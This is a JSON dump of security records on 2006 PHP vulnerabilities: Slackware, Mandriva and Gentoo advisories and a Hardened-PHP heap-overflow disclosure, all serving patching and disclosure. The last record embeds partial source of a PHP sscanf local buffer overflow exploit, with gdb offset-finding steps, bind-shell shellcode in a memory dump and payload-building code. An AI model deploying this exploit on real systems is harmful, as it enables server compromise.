sscanf() Function Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4020"], "modified": "2006-08-17T04:49:07", "href": "https://vulners.com/osvdb/OSVDB:28000", "id": "OSVDB:28000", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2018-08-31T00:37:00", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "11.0", "packageVersion": "4.4.4", "arch": "i486", "packageFilename": "php-4.4.4-i486-4_slack11.0.tgz", "packageName": "php", "operator": "lt"}], "description": "New php packages are available for Slackware 10.2 and 11.0 to\nfix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5465\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\nextra/php5/php-5.2.0-i486-1.tgz: Upgraded to php-5.2.0.\n This release "includes a large number of new features, bug fixes and security\n enhancements." In particular, when the UTF-8 charset is selected there are\n buffer overflows in the htmlspecialchars() and htmlentities() that may be\n exploited to execute arbitrary code.\n More details about the vulnerability may be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5465\n Further details about the release can be found in the release announcement:\n http://www.php.net/releases/5_2_0.php\n Some syntax has changed since PHP 5.1.x. An upgrading guide may be found at\n this location:\n http://www.php.net/UPDATE_5_2.txt\n This package was placed in /extra rather than /patches to save people from\n possible surprises with automated upgrade tools, since users of PHP4 and\n PHP 5.1.x applications may need to make some code changes before things will\n work again.\n (* Security fix *)\npatches/packages/php-4.4.4-i486-4_slack11.0.tgz: Patched the UTF-8 overflow.\n More details about the vulnerability may be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5465\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/php-4.4.4-i486-2_slack10.2.tgz\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/php-4.4.4-i486-4_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.0-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\n2c7e99db93c5f4268ab510b72439ec6a php-4.4.4-i486-2_slack10.2.tgz\n\nSlackware 11.0 packages:\n9d42f4fd0cb8513ad34fae54be5a7450 php-4.4.4-i486-4_slack11.0.tgz\n74a26ae3673b25a88cb7cd162bf37dfa php-5.2.0-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg php-4.4.4-i486-4_slack11.0.tgz", "edition": 3, "reporter": "Slackware Linux Project", "published": "2006-11-03T22:26:28", "title": "php", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-5465"], "modified": "2006-11-03T22:26:28", "id": "SSA-2006-307-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.453339", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n Hardened-PHP Project\r\n www.hardened-php.net\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n Advisory: PHP HTML Entity Encoder Heap Overflow Vulnerability\r\n Release Date: 2006/11/03\r\nLast Modified: 2006/11/03\r\n Author: Stefan Esser [sesser@hardened-php.net]\r\n\r\n Application: PHP 5 <= 5.1.6, PHP 4 <= 4.4.4\r\n Severity: Bufferoverflows in htmlentities() and\r\n htmlspecialchars() may result in arbitrary \r\n remote code execution\r\n Risk: Critical\r\nVendor Status: Vendor has released PHP 5.2.0 which fixes this issue\r\n References: http://www.hardened-php.net/advisory_132006.138.html\r\n\r\n\r\nOverview:\r\n\r\n Quote from http://www.php.net\r\n "PHP is a widely-used general-purpose scripting language that \r\n is especially suited for Web development and can be embedded \r\n into HTML."\r\n \r\n While we were searching for a hole in htmlspecialchars() and\r\n htmlentities() to bypass the encoding of certain chars to exploit \r\n a possible eval() injection hole in another application we \r\n discovered that the implementation contains a possible \r\n bufferoverflow that can be triggered when the UTF-8 charset \r\n is selected.\r\n \r\n Unfortunately the whole purpose of both functions is to prepare \r\n userinput for HTML output. Therefore they are used in most PHP \r\n applications as protection against XSS and are always exposed\r\n to userinput.\r\n \r\n By triggering the overflow it is possible to overwrite heap\r\n management structures with a limited charset. This can result in\r\n remote code execution. Exploitability has been proven against\r\n for example Linux with glibc 2.3 in a test environment. It \r\n depends on the heap layout, the OS heap implementation and the \r\n used Zend Memory Manager.\r\n\r\n\r\nDetails:\r\n\r\n The HTML entity encoder of PHP will increase the size of it's \r\n output buffer every time it reaches the end of the current buffer.\r\n Unfortunately the check assumes that the maximum length of an\r\n HTML entity is 8 chars, which is true for most entities. However\r\n especially the Greek character set contains entities that are\r\n longer than 8 chars. Because of this it is for example possible\r\n to trigger the overflow by embedding Greek theta UTF-8 characters\r\n into the input string.\r\n \r\n Because the longest HTML entity currently supported is 10 bytes\r\n long this allows overflowing the buffer with the 2 bytes ';' and\r\n '\0'. When exploiting heap overflows it can be enough to just\r\n overwrite the appending memory structure with a single '\0' char\r\n and control the content of the following memory block to execute \r\n arbitrary code.\r\n \r\n While the above Greek character exploit is only possible in the\r\n htmlentities() function it is also possible to overwrite with up\r\n to 7 chars by embedding broken UTF-8 characters into the string.\r\n The characters may come from the limited charset 0x00, 0xc0-0xfd.\r\n \r\n On Linux glibc systems this is for example enough to trick realloc \r\n into believing that the next memory block is empty and long enough \r\n to store the additional 128 bytes. The position of the buffer is \r\n therefore not changed and following writes to the output buffer\r\n will overwrite the Zend Memory Manager structure of the following\r\n block. This allows the typical linked list unlink exploit against\r\n the Zend Memory Manager.\r\n\r\n\r\nProof of Concept:\r\n\r\n The Hardened-PHP Project is not going to release a proof of concept \r\n exploit for this vulnerability.\r\n\r\n\r\nDisclosure Timeline:\r\n\r\n 31. October 2006 - Notified security@php.net, patch in CVS\r\n 01. November 2006 - Notified vendor-sec\r\n 03. November 2006 - PHP developers released PHP 5.2.0\r\n 03. November 2006 - Public Disclosure\r\n\r\n\r\nRecommendation:\r\n\r\n For PHP 4 users it is strongly recommended to patch their version of \r\n PHP with the following patch until php.net is providing PHP4 updates.\r\n\r\n http://cvs.php.net/viewvc.cgi/php-src/ext/standard/html.c?r1=1.63.2.23.2.2&r2=1.63.2.23.2.3&view=patch\r\n \r\n As usual we very strongly recommend that you install Suhosin-Patch\r\n and the Suhosin Extension, because once again this advisory proved\r\n that remotely triggerable overflows in PHP still exist. It is \r\n therefore highly recommended by us to use Suhosin-Patch. It's \r\n canary protection will detect overflows and stop execution to\r\n make exploitation very hard or impossible.\r\n \r\n FreeBSD and OpenBSD's PHP ports already come with Suhosin-Patch\r\n activated by default.\r\n \r\n Grab your copy and more information at:\r\n \r\n http://www.hardened-php.net/suhosin/index.html\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CVE-2006-5465 to this vulnerability.\r\n \r\n\r\nGPG-Key:\r\n\r\n http://www.hardened-php.net/hardened-php-signature-key.asc\r\n\r\n pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key\r\n Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1\r\n\r\n\r\nCopyright 2006 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.3 (GNU/Linux)\r\n\r\niD8DBQFFSnmgRDkUzAqGSqERAksrAJsHlMJD90XU9KtiFI6PpyLddaZ2wQCgpR++\r\nVRAQBzFoGx5SJemSTgxKTaI=\r\n=6OY5\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "reporter": "Securityvulns", "published": "2006-11-03T00:00:00", "title": "[Full-disclosure] Advisory 13/2006: PHP HTML Entity Encoder Heap Overflow Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:19", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5465"], "modified": "2006-11-03T00:00:00", "id": "SECURITYVULNS:DOC:14908", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14908", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:162\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : php\r\n Date : September 7, 2006\r\n Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n The (1) file_exists and (2) imap_reopen functions in PHP before 5.1.5\r\n do not check for the safe_mode and open_basedir settings, which allows\r\n local users to bypass the settings (CVE-2006-4481).\r\n \r\n Buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c\r\n in the GD extension in PHP before 5.1.5 allows remote attackers to have\r\n an unknown impact via a GIF file with input_code_size greater than\r\n MAX_LWZ_BITS, which triggers an overflow when initializing the table\r\n array (CVE-2006-4484).\r\n \r\n The stripos function in PHP before 5.1.5 has unknown impact and attack \r\n vectors related to an out-of-bounds read (CVE-2006-4485).\r\n \r\n CVE-2006-4485 does not affect the Corporate3 or MNF2 versions of PHP.\r\n \r\n Updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4481\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4484\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4485\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2006.0:\r\n 146279492bdd9a03694778e265582d65 2006.0/RPMS/libphp5_common5-5.0.4-9.14.20060mdk.i586.rpm\r\n ca99a7740c1b47df847a56cbb25a8e80 2006.0/RPMS/php-cgi-5.0.4-9.14.20060mdk.i586.rpm\r\n 665f72c14d5c2d485047c8c288946227 2006.0/RPMS/php-cli-5.0.4-9.14.20060mdk.i586.rpm\r\n ddb6f8354c06c2f7bd78823dc846b2b5 2006.0/RPMS/php-devel-5.0.4-9.14.20060mdk.i586.rpm\r\n a8ba6ed38bb91aa170882a2c0ad32e32 2006.0/RPMS/php-fcgi-5.0.4-9.14.20060mdk.i586.rpm\r\n ddc3fc12907892012c0db9df119edaab 2006.0/RPMS/php-imap-5.0.4-2.4.20060mdk.i586.rpm\r\n 7231862a27ba9135e9cfcce3c455af3a 2006.0/SRPMS/php-5.0.4-9.14.20060mdk.src.rpm\r\n 69d5c165b33b00454cc56b27bb21eba7 2006.0/SRPMS/php-imap-5.0.4-2.4.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n 4ba33ec1fd91fdad05aaffb2d8dc766a x86_64/2006.0/RPMS/lib64php5_common5-5.0.4-9.14.20060mdk.x86_64.rpm\r\n 023e44a6bc50c5edaa3abfe85a888ec3 x86_64/2006.0/RPMS/php-cgi-5.0.4-9.14.20060mdk.x86_64.rpm\r\n 29e82f10dba8da27a73e57df3ffc198b x86_64/2006.0/RPMS/php-cli-5.0.4-9.14.20060mdk.x86_64.rpm\r\n 69fd9d2282d1bc50c19078f8537e4084 x86_64/2006.0/RPMS/php-devel-5.0.4-9.14.20060mdk.x86_64.rpm\r\n a849151feb32d3bcca9f5d175289fce5 x86_64/2006.0/RPMS/php-fcgi-5.0.4-9.14.20060mdk.x86_64.rpm\r\n 1551e3c19dde54eaa19dabe5fe8a31db x86_64/2006.0/RPMS/php-imap-5.0.4-2.4.20060mdk.x86_64.rpm\r\n 7231862a27ba9135e9cfcce3c455af3a x86_64/2006.0/SRPMS/php-5.0.4-9.14.20060mdk.src.rpm\r\n 69d5c165b33b00454cc56b27bb21eba7 x86_64/2006.0/SRPMS/php-imap-5.0.4-2.4.20060mdk.src.rpm\r\n\r\n Corporate 3.0:\r\n 3eb436590e289bc53b5bf6560ba04b02 corporate/3.0/RPMS/libphp_common432-4.3.4-4.20.C30mdk.i586.rpm\r\n 25e55ccb44fe52f3a2dbbded0463c344 corporate/3.0/RPMS/php432-devel-4.3.4-4.20.C30mdk.i586.rpm\r\n b970a8c32bc44c3736173d90dc251141 corporate/3.0/RPMS/php-cgi-4.3.4-4.20.C30mdk.i586.rpm\r\n 90098a78f8376e8abc5cad6d6eab75f9 corporate/3.0/RPMS/php-cli-4.3.4-4.20.C30mdk.i586.rpm\r\n 65ec1dc0a8da743bbc8c31b02b2e0463 corporate/3.0/RPMS/php-gd-4.3.4-1.4.C30mdk.i586.rpm\r\n f301535d5f0f4eab5b0d6a1d9b231ef8 corporate/3.0/RPMS/php-imap-4.3.4-1.4.C30mdk.i586.rpm\r\n e7eb6f56b39b5c72b3a2dbb602ab8d46 corporate/3.0/SRPMS/php-4.3.4-4.20.C30mdk.src.rpm\r\n 55da5f48aa9e2851b88377d436fc154b corporate/3.0/SRPMS/php-gd-4.3.4-1.4.C30mdk.src.rpm\r\n 3133219ccf7cd83aec8f03823b6bcf48 corporate/3.0/SRPMS/php-imap-4.3.4-1.4.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n c5213371e2b3ff49c18bcb7eea366b86 x86_64/corporate/3.0/RPMS/lib64php_common432-4.3.4-4.20.C30mdk.x86_64.rpm\r\n 48206012e77a6949d36188f3b2743afc x86_64/corporate/3.0/RPMS/php432-devel-4.3.4-4.20.C30mdk.x86_64.rpm\r\n e37a90b7ba3b52fce6bbecd6ec8960bf x86_64/corporate/3.0/RPMS/php-cgi-4.3.4-4.20.C30mdk.x86_64.rpm\r\n 24ce234e4d366125e4a13ca5ac2d0bf6 x86_64/corporate/3.0/RPMS/php-cli-4.3.4-4.20.C30mdk.x86_64.rpm\r\n 60dd687ca2f9fc7b1aa8717533d1ed81 x86_64/corporate/3.0/RPMS/php-gd-4.3.4-1.4.C30mdk.x86_64.rpm\r\n 86ff3c6e121b52fd6a092c7f8e35885c x86_64/corporate/3.0/RPMS/php-imap-4.3.4-1.4.C30mdk.x86_64.rpm\r\n e7eb6f56b39b5c72b3a2dbb602ab8d46 x86_64/corporate/3.0/SRPMS/php-4.3.4-4.20.C30mdk.src.rpm\r\n 55da5f48aa9e2851b88377d436fc154b x86_64/corporate/3.0/SRPMS/php-gd-4.3.4-1.4.C30mdk.src.rpm\r\n 3133219ccf7cd83aec8f03823b6bcf48 x86_64/corporate/3.0/SRPMS/php-imap-4.3.4-1.4.C30mdk.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 90ed06dbf0316651afc4d8990477ca7d mnf/2.0/RPMS/libphp_common432-4.3.4-4.20.M20mdk.i586.rpm\r\n bbf7116a28e92bd9c6ce531e8014cc22 mnf/2.0/RPMS/php432-devel-4.3.4-4.20.M20mdk.i586.rpm\r\n 0c5f0a2f78cdb87ddd4a2a316d107e4c mnf/2.0/RPMS/php-cgi-4.3.4-4.20.M20mdk.i586.rpm\r\n 27885acc0df6e7fa21ee1d165df8f426 mnf/2.0/RPMS/php-cli-4.3.4-4.20.M20mdk.i586.rpm\r\n 14c40d13e47645ceaddb28508008fd8f mnf/2.0/RPMS/php-gd-4.3.4-1.4.M20mdk.i586.rpm\r\n bfdf39861fc0614d9a81889f6c0dbac6 mnf/2.0/SRPMS/php-4.3.4-4.20.M20mdk.src.rpm\r\n 1c40bfd8df9786d467993f0eabc9eff9 mnf/2.0/SRPMS/php-gd-4.3.4-1.4.M20mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFFAFKJmqjQ0CJFipgRAlCxAKCTO1wmjhvmHOxneb2oh/V31G1BngCg9eRf\r\n4PNgocaX6b6UlFBbSMDIl24=\r\n=sS0Z\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "reporter": "Securityvulns", "published": "2006-09-08T00:00:00", "title": "[Full-disclosure] [ MDKSA-2006:162 ] - Updated php packages fix vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:19", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-4484", "CVE-2006-4485", "CVE-2006-4481"], "modified": "2006-09-08T00:00:00", "id": "SECURITYVULNS:DOC:14193", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14193", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:24", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=143126", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4020"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "5.1.4-r6", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-lang/php", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nThe sscanf() PHP function contains an array boundary error that can be exploited to dereference a null pointer. This can possibly allow the bypass of the safe mode protection by executing arbitrary code. \n\n### Impact\n\nA remote attacker might be able to exploit this vulnerability in PHP applications making use of the sscanf() function, potentially resulting in the execution of arbitrary code or the execution of scripted contents in the context of the affected site. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP 4.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-4.4.3-r1\"\n\nAll PHP 5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.1.4-r6\"", "reporter": "Gentoo Foundation", "published": "2006-08-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "PHP: Arbitary code execution", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4020"], "modified": "2008-03-29T00:00:00", "id": "GLSA-200608-28", "href": "https://security.gentoo.org/glsa/200608-28", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:47:00", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6697", "https://bugs.gentoo.org/show_bug.cgi?id=207933", "http://secunia.com/advisories/28640/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0544"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.2.6-r1", "packageName": "media-libs/sdl-image", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nSDL_image is an image file library that loads images as SDL surfaces, and supports various formats like BMP, GIF, JPEG, LBM, PCX, PNG, PNM, TGA, TIFF, XCF, XPM, and XV. \n\n### Description\n\nThe LWZReadByte() function in file IMG_gif.c and the IMG_LoadLBM_RW() function in file IMG_lbm.c each contain a boundary error that can be triggered to cause a static buffer overflow and a heap-based buffer overflow. The first boundary error comes from some old vulnerable GD PHP code (CVE-2006-4484). \n\n### Impact\n\nA remote attacker can make an application using the SDL_image library to process a specially crafted GIF file or IFF ILBM file that will trigger a buffer overflow, resulting in the execution of arbitrary code with the permissions of the application or the application crash. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll SDL_image users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/sdl-image-1.2.6-r1\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2008-02-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "gentoo", "title": "SDL_image: Two buffer overflow vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4484", "CVE-2008-0544", "CVE-2007-6697"], "modified": "2008-02-06T00:00:00", "id": "GLSA-200802-01", "href": "https://security.gentoo.org/glsa/200802-01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:06", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988", "http://www.php.net/releases/5_2_1.php", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286", "https://bugs.gentoo.org/show_bug.cgi?id=153911", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5465", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0911", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1383", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1376", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909", "http://www.php.net/releases/4_4_5.php", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1375", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1380", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "5.2.1-r3", "packageName": "dev-lang/php", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nSeveral vulnerabilities were found in PHP by the Hardened-PHP Project and other researchers. These vulnerabilities include a heap-based buffer overflow in htmlentities() and htmlspecialchars() if called with UTF-8 parameters, and an off-by-one error in str_ireplace(). Other vulnerabilities were also found in the PHP4 branch, including possible overflows, stack corruptions and a format string vulnerability in the *print() functions on 64 bit systems. \n\n### Impact\n\nRemote attackers might be able to exploit these issues in PHP applications making use of the affected functions, potentially resulting in the execution of arbitrary code, Denial of Service, execution of scripted contents in the context of the affected site, security bypass or information leak. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PHP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"dev-lang/php\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2007-03-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0907", "CVE-2007-0909", "CVE-2007-1375", "CVE-2007-0911", "CVE-2007-0910", "CVE-2007-1383", "CVE-2007-0988", "CVE-2007-1286", "CVE-2007-1376", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908", "CVE-2006-5465"], "modified": "2008-03-29T00:00:00", "id": "GLSA-200703-21", "href": "https://security.gentoo.org/glsa/200703-21", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:43:46", "osvdbidlist": ["28000", "27824"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit. CVE-2006-4020. Local exploit for linux platform", "reporter": "Andi", "published": "2006-08-16T00:00:00", "type": "exploitdb", "title": "PHP <= 4.4.3 / 5.1.4 sscanf Local Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4020"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2006-08-16T00:00:00", "id": "EDB-ID:2193", "href": "https://www.exploit-db.com/exploits/2193/", "sourceData": "<?\n/***********************************************************\n * hoagie_php_sscanf.php\n * PHP <= 4.4.3 / 5.1.4 local buffer overflow exploit\n *\n * howto get offsets:\n * (set $base_addr to 0x41414141)\n * # ulimit -c 20000\n * # /etc/init.d/apache restart\n * (execute script via web browser)\n * # tail /var/log/apache/error.log\n * ...\n * [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp \n * ...\n * $ gdb /usr/sbin/apache /tmp/core\n * ...\n * ...\n * #0 0x40422b2d in php_sscanf_internal () from /usr/lib/apache/1.3/libphp4.so\n * (gdb) x/250 $edx\n * ...\n * 0x83ae16c: 0x41414141 0x41414141 0x41414141 0x41414141\n * 0x83ae17c: 0xdeadbabe 0x41414145 0x4141415d 0x00000001\n * ^^^^^^^^^^\n * start of our buffer (0x83ae180) = $base_addr\n * 0x83ae18c: 0x00000008 0x4141415d 0x0833d248 0x00000400\n * 0x83ae19c: 0x909006eb 0x90909090 0xe3f7db31 0x435366b0\n * ^^^^^^^^^^\n * start of shell code (0x83ae1a4)\n * 0x83ae1ac: 0x89534353 0x80cd4be1 0x6652c789 0x43204e68\n * 0x83ae1bc: 0xe1895366 0xd0f6efb0 0x89575150 0xcd66b0e1\n * 0x83ae1cc: 0x4366b080 0x5080cd43 0xe1895750 0xcd66b043\n * 0x83ae1dc: 0x89d98980 0x2c6fb0c3 0x80cd4930 0x51f6e241\n * 0x83ae1ec: 0x732f6e68 0x2f2f6868 0xe3896962 0xe1895351\n * 0x83ae1fc: 0xd0f6f4b0 0x414180cd 0x41414141 0x41414141\n * 0x83ae20c: 0x41414141 0x41414141 0x41414141 0x41414141\n * ...\n * (gdb) quit\n * #\n * (change $base_addr in exploit and now call url again)\n * # gdb /usr/sbin/apache /tmp/core\n * #0 0x40475e73 in _efree ()\n * from /usr/lib/apache/1.3/libphp4.so\n * (gdb) x/4w $ebp\n * 0xbfffb018: 0xbfffb038 0x40484241 0x0812a2f4 0xbfffb038\n * ^^^^^^^^^^\n * return address (return address location = 0xbfffb01c)\n * (change $rec_log in exploit and call url again)\n * $ telnet 127.0.0.1 20000\n * Trying 127.0.0.1...\n * Connected to localhost.\n * Escape character is '^]'.\n * id;\n * uid=33(www-data) gid=33(www-data) groups=33(www-data)\n * exit;\n * Connection closed by foreign host.\n * $\n *\n * NOTE: Because of PHP memory allocation this exploit depends on filename, pathname\n * content etc... (because each line/byte will change emalloc() behavior\n *\n * Credits: Heintz (discovered this bug)\n * BigHawk (bind shell code)\n * Greuff (void.at)\n *\n * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-\n * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY\n * DAMAGE DONE USING THIS PROGRAM.\n *\n * VOID.AT Security\n * andi@void.at\n * http://www.void.at\n *\n ************************************************************/\n\n /* base_addr for buffer in memory */\n $base_addr = 0x812a260;\n $base_addr_fill = 0x16;\n /* byte 0 = fill up, byte 1 = refcount, byte 2 = is_ref, byte 3 = type */\n $zval_attr = 0x00000008;\n /* will be overwritten to execute our shellcode */\n $ret_loc = 0xbfffb01c;\n /* just for searching */\n $pattern = 0xdeadbabe;\n\n function long2str($addr) {\n return pack(\"V\", $addr);\n }\n\n $data =\n \t /* fill up memory */\n str_repeat(long2str($base_addr), $base_addr_fill) . \n /* pattern */\n long2str($pattern) .\n \t /* current = base_addr */\n\t long2str($base_addr + 0x4) .\t\n /* *current = _zval_struct */\n\t /* _zval_struct */\n\t /* _zvalue_value */\n\t /* _zvalue_value.str.val */\n long2str($base_addr + 0x10 + 0xc) .\n\t /* _zvalue_value_str.len */\n\t 